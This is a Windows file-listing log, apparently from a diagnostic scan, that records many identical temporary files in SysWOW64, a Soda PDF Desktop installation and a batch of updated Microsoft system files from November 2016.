2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015280.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015234.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00015151.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014974.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014820.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014220.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00014157.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00013284.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012867.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012802.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00012309.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011535.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011478.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00011376.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00010774.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00010023.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009671.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009339.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009267.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009059.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00009043.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007802.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007557.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007344.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00007009.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00005240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004889.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004142.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00004097.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00003941.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00002180.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001474.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001240.tmp
2016-11-11 10:23 - 2016-11-11 10:23 - 01340008 ____T C:\Windows\SysWOW64\00001024.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00032574.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00032524.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00030824.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00029806.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00028199.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00026446.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00026097.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00025861.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00023992.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00023161.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00022803.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00021890.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00021069.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00020921.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019675.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019576.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00019116.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00017533.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00016828.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00012032.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00012012.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00009045.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00007928.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00007865.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004833.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004177.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00004028.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00002376.tmp
2016-11-11 10:22 - 2016-11-11 10:22 - 01340008 ____T C:\Windows\SysWOW64\00001229.tmp
2016-11-08 18:09 - 2016-11-08 18:09 - 00000784 _____ C:\Users\Public\Desktop\Soda PDF Desktop.lnk
2016-11-08 18:07 - 2016-11-08 19:35 - 00000000 ____D C:\Users\Dale\AppData\Roaming\Soda PDF Desktop
2016-11-08 18:07 - 2016-11-08 18:15 - 00000000 ____D C:\Program Files\Soda PDF Desktop
2016-11-08 18:07 - 2016-11-08 18:08 - 00000000 ____D C:\Program Files (x86)\Soda PDF Desktop
2016-11-08 18:07 - 2016-11-08 18:07 - 00000000 ____D C:\Users\Dale\Documents\Soda PDF Files
2016-11-08 18:07 - 2016-11-08 18:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Soda PDF Desktop
2016-11-08 18:04 - 2016-11-08 18:15 - 00000000 ____D C:\ProgramData\Soda PDF Desktop
2016-11-08 15:57 - 2016-11-02 09:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2016-11-08 15:57 - 2016-11-02 09:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2016-11-08 15:57 - 2016-11-02 09:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-11-08 15:57 - 2016-11-02 09:16 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-11-08 15:57 - 2016-11-02 09:16 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2016-11-08 15:57 - 2016-11-02 09:16 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2016-11-08 15:57 - 2016-11-02 08:53 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-11-08 15:57 - 2016-10-27 21:59 - 00394440 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-11-08 15:57 - 2016-10-27 21:14 - 00346320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-11-08 15:57 - 2016-10-27 13:13 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-11-08 15:57 - 2016-10-27 13:13 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-11-08 15:57 - 2016-10-27 12:55 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-11-08 15:57 - 2016-10-27 12:54 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-11-08 15:57 - 2016-10-27 12:54 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-11-08 15:57 - 2016-10-27 12:53 - 00576000 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-11-08 15:57 - 2016-10-27 12:53 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-11-08 15:57 - 2016-10-27 12:51 - 02896384 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-11-08 15:57 - 2016-10-27 12:44 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-11-08 15:57 - 2016-10-27 12:43 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-11-08 15:57 - 2016-10-27 12:38 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-11-08 15:57 - 2016-10-27 12:37 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-11-08 15:57 - 2016-10-27 12:37 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-11-08 15:57 - 2016-10-27 12:37 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-11-08 15:57 - 2016-10-27 12:37 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-11-08 15:57 - 2016-10-27 12:28 - 25763328 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-11-08 15:57 - 2016-10-27 12:28 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-11-08 15:57 - 2016-10-27 12:24 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-11-08 15:57 - 2016-10-27 12:19 - 06047744 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-11-08 15:57 - 2016-10-27 12:15 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-11-08 15:57 - 2016-10-27 12:13 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2016-11-08 15:57 - 2016-10-27 12:09 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-11-08 15:57 - 2016-10-27 12:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-11-08 15:57 - 2016-10-27 12:05 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-11-08 15:57 - 2016-10-27 12:02 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-11-08 15:57 - 2016-10-27 11:49 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-11-08 15:57 - 2016-10-27 11:46 - 00806912 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-11-08 15:57 - 2016-10-27 11:46 - 00725504 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-11-08 15:57 - 2016-10-27 11:44 - 02131456 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-11-08 15:57 - 2016-10-27 11:44 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-11-08 15:57 - 2016-10-27 11:17 - 15257088 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-11-08 15:57 - 2016-10-27 11:16 - 02920448 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-11-08 15:57 - 2016-10-27 11:03 - 01543680 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-11-08 15:57 - 2016-10-27 10:54 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-11-08 15:57 - 2016-10-27 09:05 - 20304896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-11-08 15:57 - 2016-10-25 09:02 - 03219456 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-11-08 15:57 - 2016-10-22 11:54 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-11-08 15:57 - 2016-10-22 11:36 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-11-08 15:57 - 2016-10-22 11:36 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-11-08 15:57 - 2016-10-22 11:35 - 00498688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-11-08 15:57 - 2016-10-22 11:35 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-11-08 15:57 - 2016-10-22 11:34 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-11-08 15:57 - 2016-10-22 11:27 - 02287616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-11-08 15:57 - 2016-10-22 11:27 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-11-08 15:57 - 2016-10-22 11:26 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-11-08 15:57 - 2016-10-22 11:22 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-11-08 15:57 - 2016-10-22 11:21 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-11-08 15:57 - 2016-10-22 11:21 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-11-08 15:57 - 2016-10-22 11:20 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-11-08 15:57 - 2016-10-22 11:09 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-11-08 15:57 - 2016-10-22 11:04 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-11-08 15:57 - 2016-10-22 11:03 - 00091136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll
2016-11-08 15:57 - 2016-10-22 10:59 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-11-08 15:57 - 2016-10-22 10:58 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-11-08 15:57 - 2016-10-22 10:56 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-11-08 15:57 - 2016-10-22 10:54 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-11-08 15:57 - 2016-10-22 10:46 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-11-08 15:57 - 2016-10-22 10:45 - 00693248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-11-08 15:57 - 2016-10-22 10:44 - 04608000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-11-08 15:57 - 2016-10-22 10:43 - 02055680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-11-08 15:57 - 2016-10-22 10:43 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-11-08 15:57 - 2016-10-22 10:30 - 13654016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-11-08 15:57 - 2016-10-22 10:12 - 02444800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-11-08 15:57 - 2016-10-22 10:09 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-11-08 15:57 - 2016-10-22 10:09 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-11-08 15:57 - 2016-10-15 09:31 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-11-08 15:57 - 2016-10-15 09:31 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-11-08 15:57 - 2016-10-15 09:13 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-11-08 15:57 - 2016-10-15 09:13 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-11-08 15:57 - 2016-10-11 09:37 - 00370920 _____ (Microsoft Corporation) C:\Windows\system32\clfs.sys
2016-11-08 15:57 - 2016-10-11 09:31 - 01148416 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10.IME
2016-11-08 15:57 - 2016-10-11 09:31 - 01068544 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-11-08 15:57 - 2016-10-11 09:31 - 00878080 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2016-11-08 15:57 - 2016-10-11 09:31 - 00457216 _____ (Microsoft Corporation) C:\Windows\system32\imkr80.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\input.dll
2016-11-08 15:57 - 2016-10-11 09:31 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\tintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\quick.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\qintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\phon.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\cintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00175104 _____ (Microsoft Corporation) C:\Windows\system32\chajei.ime
2016-11-08 15:57 - 2016-10-11 09:31 - 00132608 _____ (Microsoft Corporation) C:\Windows\system32\pintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 01027584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10.IME
2016-11-08 15:57 - 2016-10-11 09:18 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-11-08 15:57 - 2016-10-11 09:18 - 00701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IMJP10K.DLL
2016-11-08 15:57 - 2016-10-11 09:18 - 00430080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imkr80.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\input.dll
2016-11-08 15:57 - 2016-10-11 09:18 - 00126976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quick.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\phon.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cintlgnt.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00125952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chajei.ime
2016-11-08 15:57 - 2016-10-11 09:18 - 00090112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pintlgnt.ime
2016-11-08 15:57 - 2016-10-11 07:33 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll
2016-11-08 15:57 - 2016-10-11 07:06 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2016-11-08 15:57 - 2016-10-10 09:38 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-11-08 15:57 - 2016-10-10 09:38 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-11-08 15:57 - 2016-10-10 09:34 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-11-08 15:57 - 2016-10-10 09:34 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-11-08 15:57 - 2016-10-10 09:34 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-11-08 15:57 - 2016-10-10 09:34 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 01462272 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-11-08 15:57 - 2016-10-10 09:33 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-11-08 15:57 - 2016-10-10 09:16 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-11-08 15:57 - 2016-10-10 09:02 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-11-08 15:57 - 2016-10-10 08:56 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-11-08 15:57 - 2016-10-10 08:55 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-11-08 15:57 - 2016-10-10 08:55 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-11-08 15:57 - 2016-10-10 08:55 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-11-08 15:57 - 2016-10-10 08:54 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-11-08 15:57 - 2016-10-10 08:50 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-11-08 15:57 - 2016-10-07 09:40 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-11-08 15:57 - 2016-10-07 09:37 - 05547752 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-11-08 15:57 - 2016-10-07 09:37 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-11-08 15:57 - 2016-10-07 09:35 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-11-08 15:57 - 2016-10-07 09:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
